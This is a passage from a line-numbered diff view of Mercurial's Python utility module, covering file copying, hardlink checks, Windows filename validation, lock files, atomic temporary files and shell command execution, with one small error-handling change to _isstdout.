1028 1029 for name, fn in filtertable.iteritems():
1029 1030 if cmd.startswith(name):
1030 1031 return fn(s, cmd[len(name):].lstrip())
1031 1032 return pipefilter(s, cmd)
1032 1033
1033 1034 def binary(s):
1034 1035 """return true if a string is binary data"""
1035 1036 return bool(s and '\0' in s)
1036 1037
1037 1038 def increasingchunks(source, min=1024, max=65536):
1038 1039 '''return no less than min bytes per chunk while data remains,
1039 1040 doubling min after each chunk until it reaches max'''
1040 1041 def log2(x):
1041 1042 if not x:
1042 1043 return 0
1043 1044 i = 0
1044 1045 while x:
1045 1046 x >>= 1
1046 1047 i += 1
1047 1048 return i - 1
1048 1049
1049 1050 buf = []
1050 1051 blen = 0
1051 1052 for chunk in source:
1052 1053 buf.append(chunk)
1053 1054 blen += len(chunk)
1054 1055 if blen >= min:
1055 1056 if min < max:
1056 1057 min = min << 1
1057 1058 nmin = 1 << log2(blen)
1058 1059 if nmin > min:
1059 1060 min = nmin
1060 1061 if min > max:
1061 1062 min = max
1062 1063 yield ''.join(buf)
1063 1064 blen = 0
1064 1065 buf = []
1065 1066 if buf:
1066 1067 yield ''.join(buf)
1067 1068
1068 1069 Abort = error.Abort
1069 1070
1070 1071 def always(fn):
1071 1072 return True
1072 1073
1073 1074 def never(fn):
1074 1075 return False
1075 1076
1076 1077 def nogc(func):
1077 1078 """disable garbage collector
1078 1079
1079 1080 Python's garbage collector triggers a GC each time a certain number of
1080 1081 container objects (the number being defined by gc.get_threshold()) are
1081 1082 allocated even when marked not to be tracked by the collector. Tracking has
1082 1083 no effect on when GCs are triggered, only on what objects the GC looks
1083 1084 into. As a workaround, disable GC while building complex (huge)
1084 1085 containers.
1085 1086
1086 1087 This garbage collector issue have been fixed in 2.7. But it still affect
1087 1088 CPython's performance.
1088 1089 """
1089 1090 def wrapper(*args, **kwargs):
1090 1091 gcenabled = gc.isenabled()
1091 1092 gc.disable()
1092 1093 try:
1093 1094 return func(*args, **kwargs)
1094 1095 finally:
1095 1096 if gcenabled:
1096 1097 gc.enable()
1097 1098 return wrapper
1098 1099
1099 1100 if pycompat.ispypy:
1100 1101 # PyPy runs slower with gc disabled
1101 1102 nogc = lambda x: x
1102 1103
1103 1104 def pathto(root, n1, n2):
1104 1105 '''return the relative path from one place to another.
1105 1106 root should use os.sep to separate directories
1106 1107 n1 should use os.sep to separate directories
1107 1108 n2 should use "/" to separate directories
1108 1109 returns an os.sep-separated path.
1109 1110
1110 1111 If n1 is a relative path, it's assumed it's
1111 1112 relative to root.
1112 1113 n2 should always be relative to root.
1113 1114 '''
1114 1115 if not n1:
1115 1116 return localpath(n2)
1116 1117 if os.path.isabs(n1):
1117 1118 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1118 1119 return os.path.join(root, localpath(n2))
1119 1120 n2 = '/'.join((pconvert(root), n2))
1120 1121 a, b = splitpath(n1), n2.split('/')
1121 1122 a.reverse()
1122 1123 b.reverse()
1123 1124 while a and b and a[-1] == b[-1]:
1124 1125 a.pop()
1125 1126 b.pop()
1126 1127 b.reverse()
1127 1128 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1128 1129
1129 1130 def mainfrozen():
1130 1131 """return True if we are a frozen executable.
1131 1132
1132 1133 The code supports py2exe (most common, Windows only) and tools/freeze
1133 1134 (portable, not much used).
1134 1135 """
1135 1136 return (safehasattr(sys, "frozen") or # new py2exe
1136 1137 safehasattr(sys, "importers") or # old py2exe
1137 1138 imp.is_frozen(u"__main__")) # tools/freeze
1138 1139
1139 1140 # the location of data files matching the source code
1140 1141 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1141 1142 # executable version (py2exe) doesn't support __file__
1142 1143 datapath = os.path.dirname(pycompat.sysexecutable)
1143 1144 else:
1144 1145 datapath = os.path.dirname(pycompat.fsencode(__file__))
1145 1146
1146 1147 i18n.setdatapath(datapath)
1147 1148
1148 1149 _hgexecutable = None
1149 1150
1150 1151 def hgexecutable():
1151 1152 """return location of the 'hg' executable.
1152 1153
1153 1154 Defaults to $HG or 'hg' in the search path.
1154 1155 """
1155 1156 if _hgexecutable is None:
1156 1157 hg = encoding.environ.get('HG')
1157 1158 mainmod = sys.modules[pycompat.sysstr('__main__')]
1158 1159 if hg:
1159 1160 _sethgexecutable(hg)
1160 1161 elif mainfrozen():
1161 1162 if getattr(sys, 'frozen', None) == 'macosx_app':
1162 1163 # Env variable set by py2app
1163 1164 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1164 1165 else:
1165 1166 _sethgexecutable(pycompat.sysexecutable)
1166 1167 elif (os.path.basename(
1167 1168 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1168 1169 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1169 1170 else:
1170 1171 exe = findexe('hg') or os.path.basename(sys.argv[0])
1171 1172 _sethgexecutable(exe)
1172 1173 return _hgexecutable
1173 1174
1174 1175 def _sethgexecutable(path):
1175 1176 """set location of the 'hg' executable"""
1176 1177 global _hgexecutable
1177 1178 _hgexecutable = path
1178 1179
1179 1180 def _isstdout(f):
1180 1181 fileno = getattr(f, 'fileno', None)
1182 try:
1181 1183 return fileno and fileno() == sys.__stdout__.fileno()
1184 except io.UnsupportedOperation:
1185 return False # fileno() raised UnsupportedOperation
1182 1186
1183 1187 def shellenviron(environ=None):
1184 1188 """return environ with optional override, useful for shelling out"""
1185 1189 def py2shell(val):
1186 1190 'convert python object into string that is useful to shell'
1187 1191 if val is None or val is False:
1188 1192 return '0'
1189 1193 if val is True:
1190 1194 return '1'
1191 1195 return pycompat.bytestr(val)
1192 1196 env = dict(encoding.environ)
1193 1197 if environ:
1194 1198 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1195 1199 env['HG'] = hgexecutable()
1196 1200 return env
1197 1201
1198 1202 def system(cmd, environ=None, cwd=None, out=None):
1199 1203 '''enhanced shell command execution.
1200 1204 run with environment maybe modified, maybe in different dir.
1201 1205
1202 1206 if out is specified, it is assumed to be a file-like object that has a
1203 1207 write() method. stdout and stderr will be redirected to out.'''
1204 1208 try:
1205 1209 stdout.flush()
1206 1210 except Exception:
1207 1211 pass
1208 1212 cmd = quotecommand(cmd)
1209 1213 env = shellenviron(environ)
1210 1214 if out is None or _isstdout(out):
1211 1215 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1212 1216 env=env, cwd=cwd)
1213 1217 else:
1214 1218 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1215 1219 env=env, cwd=cwd, stdout=subprocess.PIPE,
1216 1220 stderr=subprocess.STDOUT)
1217 1221 for line in iter(proc.stdout.readline, ''):
1218 1222 out.write(line)
1219 1223 proc.wait()
1220 1224 rc = proc.returncode
1221 1225 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1222 1226 rc = 0
1223 1227 return rc
1224 1228
1225 1229 def checksignature(func):
1226 1230 '''wrap a function with code to check for calling errors'''
1227 1231 def check(*args, **kwargs):
1228 1232 try:
1229 1233 return func(*args, **kwargs)
1230 1234 except TypeError:
1231 1235 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1232 1236 raise error.SignatureError
1233 1237 raise
1234 1238
1235 1239 return check
1236 1240
1237 1241 # a whilelist of known filesystems where hardlink works reliably
1238 1242 _hardlinkfswhitelist = {
1239 1243 'btrfs',
1240 1244 'ext2',
1241 1245 'ext3',
1242 1246 'ext4',
1243 1247 'hfs',
1244 1248 'jfs',
1245 1249 'NTFS',
1246 1250 'reiserfs',
1247 1251 'tmpfs',
1248 1252 'ufs',
1249 1253 'xfs',
1250 1254 'zfs',
1251 1255 }
1252 1256
1253 1257 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1254 1258 '''copy a file, preserving mode and optionally other stat info like
1255 1259 atime/mtime
1256 1260
1257 1261 checkambig argument is used with filestat, and is useful only if
1258 1262 destination file is guarded by any lock (e.g. repo.lock or
1259 1263 repo.wlock).
1260 1264
1261 1265 copystat and checkambig should be exclusive.
1262 1266 '''
1263 1267 assert not (copystat and checkambig)
1264 1268 oldstat = None
1265 1269 if os.path.lexists(dest):
1266 1270 if checkambig:
1267 1271 oldstat = checkambig and filestat.frompath(dest)
1268 1272 unlink(dest)
1269 1273 if hardlink:
1270 1274 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1271 1275 # unless we are confident that dest is on a whitelisted filesystem.
1272 1276 try:
1273 1277 fstype = getfstype(os.path.dirname(dest))
1274 1278 except OSError:
1275 1279 fstype = None
1276 1280 if fstype not in _hardlinkfswhitelist:
1277 1281 hardlink = False
1278 1282 if hardlink:
1279 1283 try:
1280 1284 oslink(src, dest)
1281 1285 return
1282 1286 except (IOError, OSError):
1283 1287 pass # fall back to normal copy
1284 1288 if os.path.islink(src):
1285 1289 os.symlink(os.readlink(src), dest)
1286 1290 # copytime is ignored for symlinks, but in general copytime isn't needed
1287 1291 # for them anyway
1288 1292 else:
1289 1293 try:
1290 1294 shutil.copyfile(src, dest)
1291 1295 if copystat:
1292 1296 # copystat also copies mode
1293 1297 shutil.copystat(src, dest)
1294 1298 else:
1295 1299 shutil.copymode(src, dest)
1296 1300 if oldstat and oldstat.stat:
1297 1301 newstat = filestat.frompath(dest)
1298 1302 if newstat.isambig(oldstat):
1299 1303 # stat of copied file is ambiguous to original one
1300 1304 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1301 1305 os.utime(dest, (advanced, advanced))
1302 1306 except shutil.Error as inst:
1303 1307 raise Abort(str(inst))
1304 1308
1305 1309 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1306 1310 """Copy a directory tree using hardlinks if possible."""
1307 1311 num = 0
1308 1312
1309 1313 gettopic = lambda: hardlink and _('linking') or _('copying')
1310 1314
1311 1315 if os.path.isdir(src):
1312 1316 if hardlink is None:
1313 1317 hardlink = (os.stat(src).st_dev ==
1314 1318 os.stat(os.path.dirname(dst)).st_dev)
1315 1319 topic = gettopic()
1316 1320 os.mkdir(dst)
1317 1321 for name, kind in listdir(src):
1318 1322 srcname = os.path.join(src, name)
1319 1323 dstname = os.path.join(dst, name)
1320 1324 def nprog(t, pos):
1321 1325 if pos is not None:
1322 1326 return progress(t, pos + num)
1323 1327 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1324 1328 num += n
1325 1329 else:
1326 1330 if hardlink is None:
1327 1331 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1328 1332 os.stat(os.path.dirname(dst)).st_dev)
1329 1333 topic = gettopic()
1330 1334
1331 1335 if hardlink:
1332 1336 try:
1333 1337 oslink(src, dst)
1334 1338 except (IOError, OSError):
1335 1339 hardlink = False
1336 1340 shutil.copy(src, dst)
1337 1341 else:
1338 1342 shutil.copy(src, dst)
1339 1343 num += 1
1340 1344 progress(topic, num)
1341 1345 progress(topic, None)
1342 1346
1343 1347 return hardlink, num
1344 1348
1345 1349 _winreservednames = {
1346 1350 'con', 'prn', 'aux', 'nul',
1347 1351 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1348 1352 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1349 1353 }
1350 1354 _winreservedchars = ':*?"<>|'
1351 1355 def checkwinfilename(path):
1352 1356 r'''Check that the base-relative path is a valid filename on Windows.
1353 1357 Returns None if the path is ok, or a UI string describing the problem.
1354 1358
1355 1359 >>> checkwinfilename(b"just/a/normal/path")
1356 1360 >>> checkwinfilename(b"foo/bar/con.xml")
1357 1361 "filename contains 'con', which is reserved on Windows"
1358 1362 >>> checkwinfilename(b"foo/con.xml/bar")
1359 1363 "filename contains 'con', which is reserved on Windows"
1360 1364 >>> checkwinfilename(b"foo/bar/xml.con")
1361 1365 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1362 1366 "filename contains 'AUX', which is reserved on Windows"
1363 1367 >>> checkwinfilename(b"foo/bar/bla:.txt")
1364 1368 "filename contains ':', which is reserved on Windows"
1365 1369 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1366 1370 "filename contains '\\x07', which is invalid on Windows"
1367 1371 >>> checkwinfilename(b"foo/bar/bla ")
1368 1372 "filename ends with ' ', which is not allowed on Windows"
1369 1373 >>> checkwinfilename(b"../bar")
1370 1374 >>> checkwinfilename(b"foo\\")
1371 1375 "filename ends with '\\', which is invalid on Windows"
1372 1376 >>> checkwinfilename(b"foo\\/bar")
1373 1377 "directory name ends with '\\', which is invalid on Windows"
1374 1378 '''
1375 1379 if path.endswith('\\'):
1376 1380 return _("filename ends with '\\', which is invalid on Windows")
1377 1381 if '\\/' in path:
1378 1382 return _("directory name ends with '\\', which is invalid on Windows")
1379 1383 for n in path.replace('\\', '/').split('/'):
1380 1384 if not n:
1381 1385 continue
1382 1386 for c in _filenamebytestr(n):
1383 1387 if c in _winreservedchars:
1384 1388 return _("filename contains '%s', which is reserved "
1385 1389 "on Windows") % c
1386 1390 if ord(c) <= 31:
1387 1391 return _("filename contains '%s', which is invalid "
1388 1392 "on Windows") % escapestr(c)
1389 1393 base = n.split('.')[0]
1390 1394 if base and base.lower() in _winreservednames:
1391 1395 return _("filename contains '%s', which is reserved "
1392 1396 "on Windows") % base
1393 1397 t = n[-1:]
1394 1398 if t in '. ' and n not in '..':
1395 1399 return _("filename ends with '%s', which is not allowed "
1396 1400 "on Windows") % t
1397 1401
1398 1402 if pycompat.iswindows:
1399 1403 checkosfilename = checkwinfilename
1400 1404 timer = time.clock
1401 1405 else:
1402 1406 checkosfilename = platform.checkosfilename
1403 1407 timer = time.time
1404 1408
1405 1409 if safehasattr(time, "perf_counter"):
1406 1410 timer = time.perf_counter
1407 1411
1408 1412 def makelock(info, pathname):
1409 1413 try:
1410 1414 return os.symlink(info, pathname)
1411 1415 except OSError as why:
1412 1416 if why.errno == errno.EEXIST:
1413 1417 raise
1414 1418 except AttributeError: # no symlink in os
1415 1419 pass
1416 1420
1417 1421 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1418 1422 os.write(ld, info)
1419 1423 os.close(ld)
1420 1424
1421 1425 def readlock(pathname):
1422 1426 try:
1423 1427 return os.readlink(pathname)
1424 1428 except OSError as why:
1425 1429 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1426 1430 raise
1427 1431 except AttributeError: # no symlink in os
1428 1432 pass
1429 1433 fp = posixfile(pathname)
1430 1434 r = fp.read()
1431 1435 fp.close()
1432 1436 return r
1433 1437
1434 1438 def fstat(fp):
1435 1439 '''stat file object that may not have fileno method.'''
1436 1440 try:
1437 1441 return os.fstat(fp.fileno())
1438 1442 except AttributeError:
1439 1443 return os.stat(fp.name)
1440 1444
1441 1445 # File system features
1442 1446
1443 1447 def fscasesensitive(path):
1444 1448 """
1445 1449 Return true if the given path is on a case-sensitive filesystem
1446 1450
1447 1451 Requires a path (like /foo/.hg) ending with a foldable final
1448 1452 directory component.
1449 1453 """
1450 1454 s1 = os.lstat(path)
1451 1455 d, b = os.path.split(path)
1452 1456 b2 = b.upper()
1453 1457 if b == b2:
1454 1458 b2 = b.lower()
1455 1459 if b == b2:
1456 1460 return True # no evidence against case sensitivity
1457 1461 p2 = os.path.join(d, b2)
1458 1462 try:
1459 1463 s2 = os.lstat(p2)
1460 1464 if s2 == s1:
1461 1465 return False
1462 1466 return True
1463 1467 except OSError:
1464 1468 return True
1465 1469
1466 1470 try:
1467 1471 import re2
1468 1472 _re2 = None
1469 1473 except ImportError:
1470 1474 _re2 = False
1471 1475
1472 1476 class _re(object):
1473 1477 def _checkre2(self):
1474 1478 global _re2
1475 1479 try:
1476 1480 # check if match works, see issue3964
1477 1481 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1478 1482 except ImportError:
1479 1483 _re2 = False
1480 1484
1481 1485 def compile(self, pat, flags=0):
1482 1486 '''Compile a regular expression, using re2 if possible
1483 1487
1484 1488 For best performance, use only re2-compatible regexp features. The
1485 1489 only flags from the re module that are re2-compatible are
1486 1490 IGNORECASE and MULTILINE.'''
1487 1491 if _re2 is None:
1488 1492 self._checkre2()
1489 1493 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1490 1494 if flags & remod.IGNORECASE:
1491 1495 pat = '(?i)' + pat
1492 1496 if flags & remod.MULTILINE:
1493 1497 pat = '(?m)' + pat
1494 1498 try:
1495 1499 return re2.compile(pat)
1496 1500 except re2.error:
1497 1501 pass
1498 1502 return remod.compile(pat, flags)
1499 1503
1500 1504 @propertycache
1501 1505 def escape(self):
1502 1506 '''Return the version of escape corresponding to self.compile.
1503 1507
1504 1508 This is imperfect because whether re2 or re is used for a particular
1505 1509 function depends on the flags, etc, but it's the best we can do.
1506 1510 '''
1507 1511 global _re2
1508 1512 if _re2 is None:
1509 1513 self._checkre2()
1510 1514 if _re2:
1511 1515 return re2.escape
1512 1516 else:
1513 1517 return remod.escape
1514 1518
1515 1519 re = _re()
1516 1520
1517 1521 _fspathcache = {}
1518 1522 def fspath(name, root):
1519 1523 '''Get name in the case stored in the filesystem
1520 1524
1521 1525 The name should be relative to root, and be normcase-ed for efficiency.
1522 1526
1523 1527 Note that this function is unnecessary, and should not be
1524 1528 called, for case-sensitive filesystems (simply because it's expensive).
1525 1529
1526 1530 The root should be normcase-ed, too.
1527 1531 '''
1528 1532 def _makefspathcacheentry(dir):
1529 1533 return dict((normcase(n), n) for n in os.listdir(dir))
1530 1534
1531 1535 seps = pycompat.ossep
1532 1536 if pycompat.osaltsep:
1533 1537 seps = seps + pycompat.osaltsep
1534 1538 # Protect backslashes. This gets silly very quickly.
1535 1539 seps.replace('\\','\\\\')
1536 1540 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1537 1541 dir = os.path.normpath(root)
1538 1542 result = []
1539 1543 for part, sep in pattern.findall(name):
1540 1544 if sep:
1541 1545 result.append(sep)
1542 1546 continue
1543 1547
1544 1548 if dir not in _fspathcache:
1545 1549 _fspathcache[dir] = _makefspathcacheentry(dir)
1546 1550 contents = _fspathcache[dir]
1547 1551
1548 1552 found = contents.get(part)
1549 1553 if not found:
1550 1554 # retry "once per directory" per "dirstate.walk" which
1551 1555 # may take place for each patches of "hg qpush", for example
1552 1556 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1553 1557 found = contents.get(part)
1554 1558
1555 1559 result.append(found or part)
1556 1560 dir = os.path.join(dir, part)
1557 1561
1558 1562 return ''.join(result)
1559 1563
1560 1564 def checknlink(testfile):
1561 1565 '''check whether hardlink count reporting works properly'''
1562 1566
1563 1567 # testfile may be open, so we need a separate file for checking to
1564 1568 # work around issue2543 (or testfile may get lost on Samba shares)
1565 1569 f1, f2, fp = None, None, None
1566 1570 try:
1567 1571 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1568 1572 suffix='1~', dir=os.path.dirname(testfile))
1569 1573 os.close(fd)
1570 1574 f2 = '%s2~' % f1[:-2]
1571 1575
1572 1576 oslink(f1, f2)
1573 1577 # nlinks() may behave differently for files on Windows shares if
1574 1578 # the file is open.
1575 1579 fp = posixfile(f2)
1576 1580 return nlinks(f2) > 1
1577 1581 except OSError:
1578 1582 return False
1579 1583 finally:
1580 1584 if fp is not None:
1581 1585 fp.close()
1582 1586 for f in (f1, f2):
1583 1587 try:
1584 1588 if f is not None:
1585 1589 os.unlink(f)
1586 1590 except OSError:
1587 1591 pass
1588 1592
1589 1593 def endswithsep(path):
1590 1594 '''Check path ends with os.sep or os.altsep.'''
1591 1595 return (path.endswith(pycompat.ossep)
1592 1596 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1593 1597
1594 1598 def splitpath(path):
1595 1599 '''Split path by os.sep.
1596 1600 Note that this function does not use os.altsep because this is
1597 1601 an alternative of simple "xxx.split(os.sep)".
1598 1602 It is recommended to use os.path.normpath() before using this
1599 1603 function if need.'''
1600 1604 return path.split(pycompat.ossep)
1601 1605
1602 1606 def gui():
1603 1607 '''Are we running in a GUI?'''
1604 1608 if pycompat.isdarwin:
1605 1609 if 'SSH_CONNECTION' in encoding.environ:
1606 1610 # handle SSH access to a box where the user is logged in
1607 1611 return False
1608 1612 elif getattr(osutil, 'isgui', None):
1609 1613 # check if a CoreGraphics session is available
1610 1614 return osutil.isgui()
1611 1615 else:
1612 1616 # pure build; use a safe default
1613 1617 return True
1614 1618 else:
1615 1619 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1616 1620
1617 1621 def mktempcopy(name, emptyok=False, createmode=None):
1618 1622 """Create a temporary file with the same contents from name
1619 1623
1620 1624 The permission bits are copied from the original file.
1621 1625
1622 1626 If the temporary file is going to be truncated immediately, you
1623 1627 can use emptyok=True as an optimization.
1624 1628
1625 1629 Returns the name of the temporary file.
1626 1630 """
1627 1631 d, fn = os.path.split(name)
1628 1632 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1629 1633 os.close(fd)
1630 1634 # Temporary files are created with mode 0600, which is usually not
1631 1635 # what we want. If the original file already exists, just copy
1632 1636 # its mode. Otherwise, manually obey umask.
1633 1637 copymode(name, temp, createmode)
1634 1638 if emptyok:
1635 1639 return temp
1636 1640 try:
1637 1641 try:
1638 1642 ifp = posixfile(name, "rb")
1639 1643 except IOError as inst:
1640 1644 if inst.errno == errno.ENOENT:
1641 1645 return temp
1642 1646 if not getattr(inst, 'filename', None):
1643 1647 inst.filename = name
1644 1648 raise
1645 1649 ofp = posixfile(temp, "wb")
1646 1650 for chunk in filechunkiter(ifp):
1647 1651 ofp.write(chunk)
1648 1652 ifp.close()
1649 1653 ofp.close()
1650 1654 except: # re-raises
1651 1655 try:
1652 1656 os.unlink(temp)
1653 1657 except OSError:
1654 1658 pass
1655 1659 raise
1656 1660 return temp
1657 1661
1658 1662 class filestat(object):
1659 1663 """help to exactly detect change of a file
1660 1664
1661 1665 'stat' attribute is result of 'os.stat()' if specified 'path'
1662 1666 exists. Otherwise, it is None. This can avoid preparative
1663 1667 'exists()' examination on client side of this class.
1664 1668 """
1665 1669 def __init__(self, stat):
1666 1670 self.stat = stat
1667 1671
1668 1672 @classmethod
1669 1673 def frompath(cls, path):
1670 1674 try:
1671 1675 stat = os.stat(path)
1672 1676 except OSError as err:
1673 1677 if err.errno != errno.ENOENT:
1674 1678 raise
1675 1679 stat = None
1676 1680 return cls(stat)
1677 1681
1678 1682 @classmethod
1679 1683 def fromfp(cls, fp):
1680 1684 stat = os.fstat(fp.fileno())
1681 1685 return cls(stat)
1682 1686
1683 1687 __hash__ = object.__hash__
1684 1688
1685 1689 def __eq__(self, old):
1686 1690 try:
1687 1691 # if ambiguity between stat of new and old file is
1688 1692 # avoided, comparison of size, ctime and mtime is enough
1689 1693 # to exactly detect change of a file regardless of platform
1690 1694 return (self.stat.st_size == old.stat.st_size and
1691 1695 self.stat.st_ctime == old.stat.st_ctime and
1692 1696 self.stat.st_mtime == old.stat.st_mtime)
1693 1697 except AttributeError:
1694 1698 pass
1695 1699 try:
1696 1700 return self.stat is None and old.stat is None
1697 1701 except AttributeError:
1698 1702 return False
1699 1703
1700 1704 def isambig(self, old):
1701 1705 """Examine whether new (= self) stat is ambiguous against old one
1702 1706
1703 1707 "S[N]" below means stat of a file at N-th change:
1704 1708
1705 1709 - S[n-1].ctime < S[n].ctime: can detect change of a file
1706 1710 - S[n-1].ctime == S[n].ctime
1707 1711 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1708 1712 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1709 1713 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1710 1714 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1711 1715
1712 1716 Case (*2) above means that a file was changed twice or more at
1713 1717 same time in sec (= S[n-1].ctime), and comparison of timestamp
1714 1718 is ambiguous.
1715 1719
1716 1720 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1717 1721 timestamp is ambiguous".
1718 1722
1719 1723 But advancing mtime only in case (*2) doesn't work as
1720 1724 expected, because naturally advanced S[n].mtime in case (*1)
1721 1725 might be equal to manually advanced S[n-1 or earlier].mtime.
1722 1726
1723 1727 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1724 1728 treated as ambiguous regardless of mtime, to avoid overlooking
1725 1729 by confliction between such mtime.
1726 1730
1727 1731 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1728 1732 S[n].mtime", even if size of a file isn't changed.
1729 1733 """
1730 1734 try:
1731 1735 return (self.stat.st_ctime == old.stat.st_ctime)
1732 1736 except AttributeError:
1733 1737 return False
1734 1738
1735 1739 def avoidambig(self, path, old):
1736 1740 """Change file stat of specified path to avoid ambiguity
1737 1741
1738 1742 'old' should be previous filestat of 'path'.
1739 1743
1740 1744 This skips avoiding ambiguity, if a process doesn't have
1741 1745 appropriate privileges for 'path'. This returns False in this
1742 1746 case.
1743 1747
1744 1748 Otherwise, this returns True, as "ambiguity is avoided".
1745 1749 """
1746 1750 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1747 1751 try:
1748 1752 os.utime(path, (advanced, advanced))
1749 1753 except OSError as inst:
1750 1754 if inst.errno == errno.EPERM:
1751 1755 # utime() on the file created by another user causes EPERM,
1752 1756 # if a process doesn't have appropriate privileges
1753 1757 return False
1754 1758 raise
1755 1759 return True
1756 1760
1757 1761 def __ne__(self, other):
1758 1762 return not self == other
1759 1763
1760 1764 class atomictempfile(object):
1761 1765 '''writable file object that atomically updates a file
1762 1766
1763 1767 All writes will go to a temporary copy of the original file. Call
1764 1768 close() when you are done writing, and atomictempfile will rename
1765 1769 the temporary copy to the original name, making the changes
1766 1770 visible. If the object is destroyed without being closed, all your
1767 1771 writes are discarded.
1768 1772
1769 1773 checkambig argument of constructor is used with filestat, and is
1770 1774 useful only if target file is guarded by any lock (e.g. repo.lock
1771 1775 or repo.wlock).
1772 1776 '''
1773 1777 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1774 1778 self.__name = name # permanent name
1775 1779 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1776 1780 createmode=createmode)
1777 1781 self._fp = posixfile(self._tempname, mode)
1778 1782 self._checkambig = checkambig
1779 1783
1780 1784 # delegated methods
1781 1785 self.read = self._fp.read
1782 1786 self.write = self._fp.write
1783 1787 self.seek = self._fp.seek
1784 1788 self.tell = self._fp.tell
1785 1789 self.fileno = self._fp.fileno
1786 1790
1787 1791 def close(self):
1788 1792 if not self._fp.closed:
1789 1793 self._fp.close()
1790 1794 filename = localpath(self.__name)
1791 1795 oldstat = self._checkambig and filestat.frompath(filename)
1792 1796 if oldstat and oldstat.stat:
1793 1797 rename(self._tempname, filename)
1794 1798 newstat = filestat.frompath(filename)
1795 1799 if newstat.isambig(oldstat):
1796 1800 # stat of changed file is ambiguous to original one
1797 1801 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1798 1802 os.utime(filename, (advanced, advanced))
1799 1803 else:
1800 1804 rename(self._tempname, filename)
1801 1805
1802 1806 def discard(self):
1803 1807 if not self._fp.closed:
1804 1808 try:
1805 1809 os.unlink(self._tempname)
1806 1810 except OSError:
1807 1811 pass
1808 1812 self._fp.close()
1809 1813
1810 1814 def __del__(self):
1811 1815 if safehasattr(self, '_fp'): # constructor actually did something
1812 1816 self.discard()
1813 1817
1814 1818 def __enter__(self):
1815 1819 return self
1816 1820
1817 1821 def __exit__(self, exctype, excvalue, traceback):
1818 1822 if exctype is not None:
1819 1823 self.discard()
1820 1824 else:
1821 1825 self.close()
1822 1826
1823 1827 def unlinkpath(f, ignoremissing=False):
1824 1828 """unlink and remove the directory if it is empty"""
1825 1829 if ignoremissing:
1826 1830 tryunlink(f)
1827 1831 else:
1828 1832 unlink(f)
1829 1833 # try removing directories that might now be empty
1830 1834 try:
1831 1835 removedirs(os.path.dirname(f))
1832 1836 except OSError:
1833 1837 pass
1834 1838
1835 1839 def tryunlink(f):
1836 1840 """Attempt to remove a file, ignoring ENOENT errors."""
1837 1841 try:
1838 1842 unlink(f)
1839 1843 except OSError as e:
1840 1844 if e.errno != errno.ENOENT:
1841 1845 raise
1842 1846
1843 1847 def makedirs(name, mode=None, notindexed=False):
1844 1848 """recursive directory creation with parent mode inheritance
1845 1849
1846 1850 Newly created directories are marked as "not to be indexed by
1847 1851 the content indexing service", if ``notindexed`` is specified
1848 1852 for "write" mode access.
1849 1853 """
1850 1854 try:
1851 1855 makedir(name, notindexed)
1852 1856 except OSError as err:
1853 1857 if err.errno == errno.EEXIST:
1854 1858 return
1855 1859 if err.errno != errno.ENOENT or not name:
1856 1860 raise
1857 1861 parent = os.path.dirname(os.path.abspath(name))
1858 1862 if parent == name:
1859 1863 raise
1860 1864 makedirs(parent, mode, notindexed)
1861 1865 try:
1862 1866 makedir(name, notindexed)
1863 1867 except OSError as err:
1864 1868 # Catch EEXIST to handle races
1865 1869 if err.errno == errno.EEXIST:
1866 1870 return
1867 1871 raise
1868 1872 if mode is not None:
1869 1873 os.chmod(name, mode)
1870 1874
1871 1875 def readfile(path):
1872 1876 with open(path, 'rb') as fp:
1873 1877 return fp.read()
1874 1878
1875 1879 def writefile(path, text):
1876 1880 with open(path, 'wb') as fp:
1877 1881 fp.write(text)
1878 1882
1879 1883 def appendfile(path, text):
1880 1884 with open(path, 'ab') as fp:
1881 1885 fp.write(text)
1882 1886
1883 1887 class chunkbuffer(object):
1884 1888 """Allow arbitrary sized chunks of data to be efficiently read from an
1885 1889 iterator over chunks of arbitrary size."""
1886 1890
1887 1891 def __init__(self, in_iter):
1888 1892 """in_iter is the iterator that's iterating over the input chunks."""
1889 1893 def splitbig(chunks):
1890 1894 for chunk in chunks:
